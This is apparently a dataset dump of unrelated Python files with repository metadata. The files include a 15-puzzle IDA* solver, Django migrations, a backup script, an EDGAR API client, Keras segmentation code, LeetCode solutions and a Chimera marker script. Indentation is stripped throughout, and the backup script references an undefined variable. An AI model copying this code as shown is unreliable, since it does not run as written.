# https://codegolf.stackexchange.com/questions/6884/solve-the-15-puzzle-the-tile-sliding-puzzle
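# IDA* (iterative-deepening A*): run repeated depth-first searches bounded by
# f = g + h, raising the bound each pass to the smallest f-value that exceeded
# it, so memory use stays linear in the solution path length.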
class IDAStar:
def __init__(self, h, neighbours):
self.h = h
self.neighbours = neighbours
self.FOUND = object()
def solve(self, root, is_goal, max_cost=None):
self.is_goal = is_goal
self.path = [root]
self.is_in_path = {root}
self.path_descrs = []
self.nodes_evaluated = 0
bound = self.h(root)
while True:
t = self._search(0, bound)
if t is self.FOUND:
return self.path, self.path_descrs, bound, self.nodes_evaluated
if t is None:
return None
bound = t
def _search(self, g, bound):
self.nodes_evaluated += 1
node = self.path[-1]
f = g + self.h(node)
if f > bound:
return f
if self.is_goal(node):
return self.FOUND
m = None
for cost, n, descr in self.neighbours(node):
if n in self.is_in_path:
continue
self.path.append(n)
self.is_in_path.add(n)
self.path_descrs.append(descr)
t = self._search(g + cost, bound)
if t == self.FOUND:
return self.FOUND
if m is None or (t is not None and t < m):
m = t
self.path.pop()
self.path_descrs.pop()
self.is_in_path.remove(n)
return m
def slide_solved_state(n):
return tuple(i % (n * n) for i in range(1, n * n + 1))
def slide_neighbours(n):
movelist = []
for gap in range(n * n):
x, y = gap % n, gap // n
moves = []
if x > 0:
moves.append(-1)
if x < n - 1:
moves.append(+1)
if y > 0:
moves.append(-n)
if y < n - 1:
moves.append(+n)
movelist.append(moves)
def neighbours(p):
gap = p.index(0)
l = list(p)
for m in movelist[gap]:
l[gap] = l[gap + m]
l[gap + m] = 0
yield (1, tuple(l), (l[gap], m))
l[gap + m] = l[gap]
l[gap] = 0
return neighbours
def encode_cfg(cfg, n):
r = 0
b = n.bit_length()
for i in range(len(cfg)):
r |= cfg[i] << (b * i)
return r
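# Build the "walking distance" heuristic table (a classic 15-puzzle lower
# bound): breadth-first search from the solved row-count configuration, where
# each state records, per board row, how many tiles belong in each goal row,
# and the stored cost is the minimum number of vertical moves to reach it.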
def gen_wd_table(n):
goal = [[0] * i + [n] + [0] * (n - 1 - i) for i in range(n)]
goal[-1][-1] = n - 1
goal = tuple(sum(goal, []))
table = {}
to_visit = [(goal, 0, n - 1)]
while to_visit:
cfg, cost, e = to_visit.pop(0)
enccfg = encode_cfg(cfg, n)
if enccfg in table:
continue
table[enccfg] = cost
for d in [-1, 1]:
if 0 <= e + d < n:
for c in range(n):
if cfg[n * (e + d) + c] > 0:
ncfg = list(cfg)
ncfg[n * (e + d) + c] -= 1
ncfg[n * e + c] += 1
to_visit.append((tuple(ncfg), cost + 1, e + d))
return table
def slide_wd(n, goal):
wd = gen_wd_table(n)
goals = {i: goal.index(i) for i in goal}
b = n.bit_length()
def h(p):
ht = 0
vt = 0
d = 0
for i, c in enumerate(p):
if c == 0:
continue
g = goals[c]
xi, yi = i % n, i // n
xg, yg = g % n, g // n
ht += 1 << (b * (n * yi + yg))
vt += 1 << (b * (n * xi + xg))
if yg == yi:
for k in range(i + 1, i - i % n + n):
if p[k] and goals[p[k]] // n == yi and goals[p[k]] < g:
d += 2
if xg == xi:
for k in range(i + n, n * n, n):
if p[k] and goals[p[k]] % n == xi and goals[p[k]] < g:
d += 2
d += wd[ht] + wd[vt]
return d
return h
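# Usage sketch (not part of the original file; `start` is a hypothetical
# length-16 tuple with 0 standing in for the gap):
# goal = slide_solved_state(4)
# solver = IDAStar(slide_wd(4, goal), slide_neighbours(4))
# result = solver.solve(start, lambda p: p == goal)
# if result:
#     path, moves, bound, nodes_evaluated = result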
|
[
"lw_git@mail.ru"
] |
lw_git@mail.ru
|
a8491753e9b9fe0cc8c2af6b7127150d578917db
|
97c326715d884169e60567553c40ba528cce0333
|
/todo_app/migrations/0001_initial.py
|
c0c0ca6a9c4bc03e05d17cef5667b419d5c54883
|
[] |
no_license
|
anurajr067/task
|
cad93b604af469c810007b15177e041d0fbe429b
|
82f7142caa6da6acd2db34fec26f51349a1f7c2a
|
refs/heads/master
| 2023-08-30T10:46:51.126256
| 2021-11-03T10:51:36
| 2021-11-03T10:51:36
| 424,180,891
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 537
|
py
|
# Generated by Django 3.2.9 on 2021-11-02 14:12
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('priority', models.IntegerField()),
],
),
]
|
[
"anurajr06@gmail.com"
] |
anurajr06@gmail.com
|
963c944290dde8a0570ef60185e02857a933d42d
|
1dd77c3652abf3321fdb449f452d368feef3e756
|
/src/runners/HW3/fix.py
|
d7146ff04540918187d07a32f7c5d9304aecb2bc
|
[] |
no_license
|
ronnygeo/SearchEngine
|
6e44a7b738974f5ba76f804d54d391173f21bfc1
|
1ea72694b87e2d722f22427d57e15a3cd965f9ec
|
refs/heads/master
| 2021-06-17T20:21:06.221263
| 2017-06-30T14:32:22
| 2017-06-30T14:32:22
| 94,489,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 635
|
py
|
import os
import re
for root, _, files in os.walk("../../../output/data5/", topdown=False):
for name in files:
if name.startswith("data"):
print(os.path.join(root, name))
try:
with open("../../../output/datafix/"+name, "wb") as out:
with open(os.path.join(root, name), encoding="utf-8") as fp:
for line in fp:
newline = re.sub("</HTML>", "</HTMLSOURCE>", line)
out.write(newline.encode("UTF-8"))
except UnicodeDecodeError:
print("Unicode Error: ", name)
|
[
"rmathew@ruelala.com"
] |
rmathew@ruelala.com
|
f8b408e979f4e27f681ffa668357f87e9502d668
|
d8bacd9471607634f9a0b9302a02fcc944edd8ac
|
/Fix a slow system with python/daily_sync.py
|
d91c6cd20e1108b2016c7a7bee2aa0fbda643f10
|
[] |
no_license
|
sechibueze/automate-real-world-tasks-using-python
|
54bfe8a3642f8791aa6168a51376eb10febf4495
|
cf8bf829e246759f91f0a1834b8a94dfeef25639
|
refs/heads/master
| 2023-06-15T09:04:31.355437
| 2021-07-14T12:54:02
| 2021-07-14T12:54:02
| 385,939,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,089
|
py
|
#!/usr/bin/env python
import subprocess
import os
from multiprocessing import Pool
src = "/data/prod/"
dest = "/data/prod_backup/"
WORKING_DIR = os.getcwd()
src = os.path.abspath(src)
dest = os.path.abspath(dest)
# Basic test
#source = os.path.join(WORKING_DIR, "prod")
#destination = os.path.join(WORKING_DIR, "dest")
print("working dir", WORKING_DIR)
print("src dir", src)
print("dest", dest)
def get_path_list(src_directory):
src_directory = os.path.abspath(src_directory)
print("src backup dir : ", src_directory)
path_list = []
for directory, folderslist, fileslist in os.walk(src_directory):
directory = os.path.abspath(directory)
subfolder = directory[len(src_directory):]
print("processing root dir ", directory)
for f in fileslist:
# Get the sub folder
file_item = f
# Add subfolder and file to list
# so we can get them via src/subfolder/file_item
# print("subfolder : root/", subfolder)
print("file root/subfolder/", (subfolder, file_item))
path_list.append((subfolder, file_item))
if folderslist != []:
for d in folderslist:
# subfolder = directory[len(src_directory):]
# print("subfolder : root/", subfolder)
print("file root/subfolder/", (subfolder, d))
path_list.append((subfolder, d))
return path_list
def backup(path):
print("backing up", path)
_from = os.path.join(os.path.abspath(src), path[0], path[1])
to = os.path.join(os.path.abspath(dest), path[0])
flags = "-arq"
print("processing...", _from, " => ", to)
subprocess.call(["rsync", flags, _from, to])
if __name__ == "__main__":
backup_source = get_path_list(src)
print("backup src size", len(backup_source))
# with multiprocessing.Pool(len(backup_source), maxtasksperchild=1) as pool:
pool = Pool(len(backup_source))
pool.map(backup, backup_source)
print("backup list", get_path_list(source))
# subprocess.call(["rsync", "-arq", src, dest])
|
[
"sechibueze@gmail.com"
] |
sechibueze@gmail.com
|
a72ae97de599ae16e4856505c4683b9bdc800603
|
fc35472e85c74fdbbe3fb77bd71d09d128ed14f3
|
/SecData/CompanyData/EdgarAPI.py
|
ec2ddbef7a89fa631ea8e6bbedc48d2e427d0bef
|
[] |
no_license
|
RicardoJavierFernandez/Accessing-SEC-EDGAR-Data
|
5342c988f0e8c103e33b03fcde5cbd11bd395def
|
7c7be5975894f8acf90481906c8f38c15467880e
|
refs/heads/master
| 2022-02-15T09:18:33.415678
| 2019-09-04T01:20:07
| 2019-09-04T01:20:07
| 198,127,883
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
import requests
import json
import os
from dotenv import load_dotenv
class FinancialData:
def __init__(self, period):
self.period = period
@staticmethod
def get_api_key():
env_path = os.path.join(os.path.dirname(__file__), '.env')
load_dotenv(env_path)
edgar_api = os.environ.get('edgar_key')
return edgar_api
def request_data(self, company_ticker):
url = 'https://datafied.api.edgar-online.com/v2/corefinancials/{period}.json?primarysymbols={ticker}&appkey={key}'.format(period=self.period, ticker=company_ticker, key=self.get_api_key())
response = requests.get(url)
data = json.loads(response.text)
for item in data['result']['rows']: # [0]['values']
for value in item['values']:
print(value)
annual = FinancialData('ann')
# annual.request_data('MSFT')
quarterly = FinancialData('qtr')
# quarterly.request_data('MSFT')
# Test to see if we can make multiple requests
def multiple_companies_data(object):
company_tickers = ['AAPL', 'MSFT', 'BA']
for company in company_tickers:
object.request_data(company)
# multiple_companies_data(quarterly)
|
[
"ricky@Ricardos-MacBook-Pro.local"
] |
ricky@Ricardos-MacBook-Pro.local
|
72757ad24b3786688fe2ed56dc3dbe1b4730e05e
|
40737b33c8b2d12ec9878e5e0f34d354481f14e3
|
/segmentation/segnet_small.py
|
3c241306339734a21e75584a283e3c6cf88a0da9
|
[] |
no_license
|
vectorai/davinci_vision_tf
|
440cf4514689ae92ece4d1cf9b240618134cf58b
|
1811e68242e8fe6d29ff2c0a9dc6337bd693e382
|
refs/heads/master
| 2021-01-21T14:47:58.503932
| 2017-01-19T17:00:16
| 2017-01-19T17:00:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,376
|
py
|
from __future__ import absolute_import
from __future__ import print_function
import os
#os.environ['KERAS_BACKEND'] = 'theano'
#os.environ['THEANO_FLAGS']='mode=FAST_RUN,device=gpu1,floatX=float32,optimizer=fast_compile,lib.cnmem=0.85'
import pylab as pl
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import itertools
import numpy as np
import theano.tensor as T
np.random.seed(1337) # for reproducibility
from keras.layers.noise import GaussianNoise
import keras.models as models
from keras.layers.core import Layer, Dense, Dropout, Activation, Flatten, Reshape, Merge, Permute
from keras.layers.convolutional import Convolution2D, MaxPooling2D, UpSampling2D, ZeroPadding2D
from keras.layers.normalization import BatchNormalization
from keras.utils import np_utils
from keras.regularizers import ActivityRegularizer
#from keras.utils.visualize_util import plot
from keras import backend as K
import h5py as h5
import cv2
import numpy as np
path = './household_data/rgbd-dataset/'
data_shape = 360/4*480/4
num_classes=53
class UnPooling2D(Layer):
"""A 2D Repeat layer"""
def __init__(self, poolsize=(2, 2)):
super(UnPooling2D, self).__init__()
self.poolsize = poolsize
@property
def output_shape(self):
input_shape = self.input_shape
return (input_shape[0], input_shape[1],
self.poolsize[0] * input_shape[2],
self.poolsize[1] * input_shape[3])
def get_output(self, train):
X = self.get_input(train)
s1 = self.poolsize[0]
s2 = self.poolsize[1]
output = X.repeat(s1, axis=2).repeat(s2, axis=3)
return output
def get_config(self):
return {"name":self.__class__.__name__,
"poolsize":self.poolsize}
def create_encoding_layers():
kernel = 3
filter_size = 64
pad = 1
pool_size = 2
return [
ZeroPadding2D(padding=(pad,pad)),
Convolution2D(filter_size, kernel, kernel, border_mode='valid'),
BatchNormalization(),
Activation('relu'),
MaxPooling2D(pool_size=(pool_size, pool_size)),
ZeroPadding2D(padding=(pad,pad)),
Convolution2D(128, kernel, kernel, border_mode='valid'),
BatchNormalization(),
Activation('relu'),
# MaxPooling2D(pool_size=(pool_size, pool_size)),
# ZeroPadding2D(padding=(pad,pad)),
# Convolution2D(256, kernel, kernel, border_mode='valid'),
# BatchNormalization(),
# Activation('relu'),
# MaxPooling2D(pool_size=(pool_size, pool_size)),
# ZeroPadding2D(padding=(pad,pad)),
# Convolution2D(512, kernel, kernel, border_mode='valid'),
# BatchNormalization(),
# Activation('relu'),
# MaxPooling2D(pool_size=(pool_size, pool_size)),
]
def create_decoding_layers():
kernel = 3
filter_size = 64
pad = 1
pool_size = 2
return[
#UpSampling2D(size=(pool_size,pool_size)),
ZeroPadding2D(padding=(pad,pad)),
Convolution2D(128, kernel, kernel, border_mode='valid'),
BatchNormalization(),
UpSampling2D(size=(pool_size,pool_size)),
ZeroPadding2D(padding=(pad,pad)),
Convolution2D(filter_size, kernel, kernel, border_mode='valid'),
BatchNormalization(),
]
def model(input_shape):
autoencoder = models.Sequential()
# Add a noise layer to get a denoising autoencoder. This helps avoid overfitting
autoencoder.add(Layer(input_shape=input_shape))
#autoencoder.add(GaussianNoise(sigma=0.3))
autoencoder.encoding_layers = create_encoding_layers()
autoencoder.decoding_layers = create_decoding_layers()
for i,l in enumerate(autoencoder.encoding_layers):
autoencoder.add(l)
print(i,l.input_shape,l.output_shape)
for i,l in enumerate(autoencoder.decoding_layers):
autoencoder.add(l)
print(i,l.input_shape,l.output_shape)
the_conv=(Convolution2D(num_classes, 1, 1, border_mode='valid',))
autoencoder.add(the_conv)
print (the_conv.input_shape,the_conv.output_shape)
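# Flatten the spatial dimensions to (num_classes, H*W), swap axes to
# (H*W, num_classes), then apply softmax so each pixel gets a probability
# distribution over the classes.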
autoencoder.add(Reshape((num_classes,data_shape)))#, input_shape=(num_classes,360,480)))
autoencoder.add(Permute((2, 1)))
autoencoder.add(Activation('softmax'))
#from keras.optimizers import SGD
#optimizer = SGD(lr=0.01, momentum=0.8, decay=0., nesterov=False)
return autoencoder
|
[
"raulpuric@berkeley.edu"
] |
raulpuric@berkeley.edu
|
145893f711e24039e4bd72458aa31c510fee8669
|
8919a06d37109957797c6e741b6ccaa8c58cd524
|
/sg_auth/apps.py
|
6f3255f5cda9fb008bdcad0ebda671ae0fd3653d
|
[] |
no_license
|
itslong/study_guide
|
fa7405077f19ebadca9a6a118ae1b972486b2bcd
|
84c4d3c34aca12bf0730dd878935329aa4cb67f8
|
refs/heads/master
| 2023-01-13T22:53:57.713958
| 2020-03-26T20:07:46
| 2020-03-26T20:07:46
| 228,972,988
| 0
| 0
| null | 2023-01-05T07:21:09
| 2019-12-19T04:12:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 88
|
py
|
from django.apps import AppConfig
class SgAuthConfig(AppConfig):
name = 'sg_auth'
|
[
"lliang@Earth-C-137.local"
] |
lliang@Earth-C-137.local
|
9198fc3018431e7b81593895817db2fc54427b4e
|
172d207feab16e09963adb2199ed851d5c691500
|
/manage.py
|
0f3555abcd7f990a3dc38e1a614b3121cc857230
|
[
"MIT"
] |
permissive
|
kas2337/kas-library
|
dd37dc75f5fe0ea524b88969845a8ecc58117a68
|
67bf612597ae4c03433fa683b85bff7093d6ffbe
|
refs/heads/main
| 2023-08-10T21:15:16.841694
| 2021-09-28T07:26:09
| 2021-09-28T07:26:09
| 409,850,555
| 0
| 0
|
MIT
| 2021-09-24T06:52:10
| 2021-09-24T06:04:18
| null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'kas_library.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"artem.kuznetsov@osinit.com"
] |
artem.kuznetsov@osinit.com
|
84a60bb0fca1b111b3184419caca0e1aad3ff1bb
|
344bdd04d310394c3fb2a693ebc8ad442dbd87cf
|
/240_search_a_2DMatrix_II.py
|
c58efe18b8c5d623a4a0cb47dc211d3746de85a6
|
[] |
no_license
|
AprilSun007/Leetcode
|
6372316829288c152722b2f7207cbc88273fe948
|
f5d6a4d0754c4ac85e62458b183e69e78373342b
|
refs/heads/master
| 2020-09-28T09:27:34.445862
| 2020-09-18T03:09:43
| 2020-09-18T03:09:43
| 226,747,465
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,902
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 7 23:07:37 2019
240. Search a 2D Matrix II
Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:
Integers in each row are sorted in ascending order from left to right.
Integers in each column are sorted in ascending order from top to bottom.
Example:
Consider the following matrix:
[
[1, 4, 7, 11, 15],
[2, 5, 8, 12, 19],
[3, 6, 9, 16, 22],
[10, 13, 14, 17, 24],
[18, 21, 23, 26, 30]
]
Given target = 5, return true.
@author: jinwensun
"""
import math
class Solution_final:
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if len(matrix) == 0:
return False
if len(matrix) == 1:
return target in matrix[0]
if matrix[0][0] > target or matrix[-1][-1] < target:
return False
n_row = len(matrix)
n_col = len(matrix[0])
x1 = n_row -1
x2 = 0
while x1 >= 0 and x2 < n_col:
if matrix[x1][x2] == target:
return True
elif matrix[x1][x2] > target:
x1 = x1 -1
else:
x2 = x2 + 1
return False
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if len(matrix) == 0:
return False
if len(matrix) == 1:
return target in matrix[0]
if matrix[0][0] > target or matrix[-1][-1] < target:
return False
n_rows = len(matrix)
mid = int(math.floor((n_rows-1)/2))
index_upper = False
index_lower = False
if matrix[mid][-1] > target:
index_upper = self.searchMatrix(matrix[0:(mid + 1)], target)
elif matrix[mid][-1] == target:
return True
if matrix[mid+1][0] < target:
index_lower = self.searchMatrix(matrix[(mid+1):], target)
elif matrix[mid+1][0] == target:
return True
return (index_upper or index_lower)
# ------------------------ Leedcode ---------------------------- #
class Solution_BinarySearch:
def binary_search(self, matrix, target, start, vertical):
lo = start
hi = len(matrix[0])-1 if vertical else len(matrix)-1
while hi >= lo:
mid = (lo + hi)//2
if vertical: # searching a column
if matrix[start][mid] < target:
lo = mid + 1
elif matrix[start][mid] > target:
hi = mid - 1
else:
return True
else: # searching a row
if matrix[mid][start] < target:
lo = mid + 1
elif matrix[mid][start] > target:
hi = mid - 1
else:
return True
return False
def searchMatrix(self, matrix, target):
# an empty matrix obviously does not contain `target`
if not matrix:
return False
# iterate over matrix diagonals starting in bottom left.
for i in range(min(len(matrix), len(matrix[0]))):
vertical_found = self.binary_search(matrix, target, i, True)
horizontal_found = self.binary_search(matrix, target, i, False)
if vertical_found or horizontal_found:
return True
return False
class Solution_DivideConquer:
def searchMatrix(self, matrix, target):
# an empty matrix obviously does not contain `target`
if not matrix:
return False
def search_rec(left, up, right, down):
# this submatrix has no height or no width.
if left > right or up > down:
return False
# `target` is already larger than the largest element or smaller
# than the smallest element in this submatrix.
elif target < matrix[up][left] or target > matrix[down][right]:
return False
mid = left + (right-left)//2
# Locate `row` such that matrix[row-1][mid] < target < matrix[row][mid]
row = up
while row <= down and matrix[row][mid] <= target:
if matrix[row][mid] == target:
return True
row += 1
return search_rec(left, row, mid-1, down) or search_rec(mid+1, up, right, row-1)
return search_rec(0, 0, len(matrix[0])-1, len(matrix)-1)
class Solution_SpaceReduction:
def searchMatrix(self, matrix, target):
# an empty matrix obviously does not contain `target` (make this check
# because we want to cache `width` for efficiency's sake)
if len(matrix) == 0 or len(matrix[0]) == 0:
return False
# cache these, as they won't change.
height = len(matrix)
width = len(matrix[0])
# start our "pointer" in the bottom-left
row = height-1
col = 0
while col < width and row >= 0:
if matrix[row][col] > target:
row -= 1
elif matrix[row][col] < target:
col += 1
else: # found it
return True
return False
if __name__ == '__main__':
nums = [[5],[6]]
target = 6
s = Solution_final()
#print(s.twoSum_ptr(nums, 0, False))
print(s.searchMatrix(nums, target))
|
[
"jinwnesun007@gmail.com"
] |
jinwnesun007@gmail.com
|
3cedea4a1d40e03471f96a58f25daf209586b9f7
|
0e9ff12bf44570d4b00beeac043f4608174641a4
|
/run_LodgeNet.py
|
6984aef46bb2b946b49fd015bf5298075719ea6f
|
[
"MIT"
] |
permissive
|
FarhadMaleki/LodgedNet
|
a675e3ce651b0445243b9bfef0e8a0c621f9010f
|
9334806dcb158d6027d9fb4b3f588c5d36ba468e
|
refs/heads/master
| 2022-07-18T10:26:48.832004
| 2019-10-18T03:12:15
| 2019-10-18T03:12:15
| 180,228,006
| 18
| 6
|
MIT
| 2022-06-21T21:53:40
| 2019-04-08T20:30:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,572
|
py
|
import time
import numpy as np
from models import DeepLodge, redefine_classifier
from runner import run
import os.path
import torch
from utils import calculate_test_acc
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
SEED = 1
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
# crop must be either 'wheat' or 'canola'
crop = 'wheat'
# num_channels must be either 3 or 5
num_channels = 3
if num_channels == 3:
data_format = 'RGB'
else:
data_format = 'BGRRededgeNIR'
# Set dataset information
data_dir = "."
train_dir = os.path.join(data_dir, "data/{}/{}/train".format(crop, data_format))
test_dir = os.path.join(data_dir, "data/{}/{}/test".format(crop, data_format))
batch_size = 16
num_epochs = 50
# Model creation
model_ft = DeepLodge(feature_size=42, num_channels=num_channels)
###############################################################################
num_params = sum(p.numel() for p in model_ft.parameters())
logger.info('Number of parameters: {}'.format(num_params))
###############################################################################
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model_ft, loader = run(model_ft, train_dir, test_dir, crop, num_channels,
batch_size, num_epochs)
dataloaders = loader.dataloaders
testloader = dataloaders["test"]
test_acc = calculate_test_acc(model_ft, testloader, device)
logger.info('\nTest Acc: {:4f}'.format(test_acc.item()))
|
[
"farhad.maleki@usask.ca"
] |
farhad.maleki@usask.ca
|
b3b20fdc6ff7c91e7b8a202afc9e8292bc8e8779
|
711756b796d68035dc6a39060515200d1d37a274
|
/output_cog/optimized_44838.py
|
81bfad0bb617706addec6575ebd8cdc2b70a351a
|
[] |
no_license
|
batxes/exocyst_scripts
|
8b109c279c93dd68c1d55ed64ad3cca93e3c95ca
|
a6c487d5053b9b67db22c59865e4ef2417e53030
|
refs/heads/master
| 2020-06-16T20:16:24.840725
| 2016-11-30T16:23:16
| 2016-11-30T16:23:16
| 75,075,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,836
|
py
|
import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((613.939, 549.207, 490.2), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((557.861, 545.181, 530.5), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((487.181, 538.691, 570.993), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((488.926, 561.447, 434.039), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((347.183, 509.951, 702.034), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((577.763, 552.573, 519.036), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((580.023, 553.49, 517.972), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((588.494, 571.881, 497.469), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((572.502, 591.995, 485.359), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((560.469, 616.538, 492.083), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((573.95, 634.349, 508.296), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((590.831, 646.888, 525.365), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((602.233, 539.559, 512.34), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((576.902, 749.27, 541.163), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((447.415, 662.788, 670.034), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((447.415, 662.788, 670.034), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((437.933, 650.205, 646.329), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((452.764, 629.194, 633.662), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((471.335, 609.708, 622.491), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((492.954, 594.647, 608.938), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((514.969, 581.364, 593.482), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((537.215, 567.241, 578.712), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((440.647, 803.794, 602.929), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((655.636, 337.061, 539.021), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((526.957, 540.456, 597.521), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((526.957, 540.456, 597.521), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((513.284, 520.402, 582.033), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((502.088, 513.414, 556.191), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((483.053, 528.089, 539.193), (0.3, 0.3, 0.3), 17.1475)
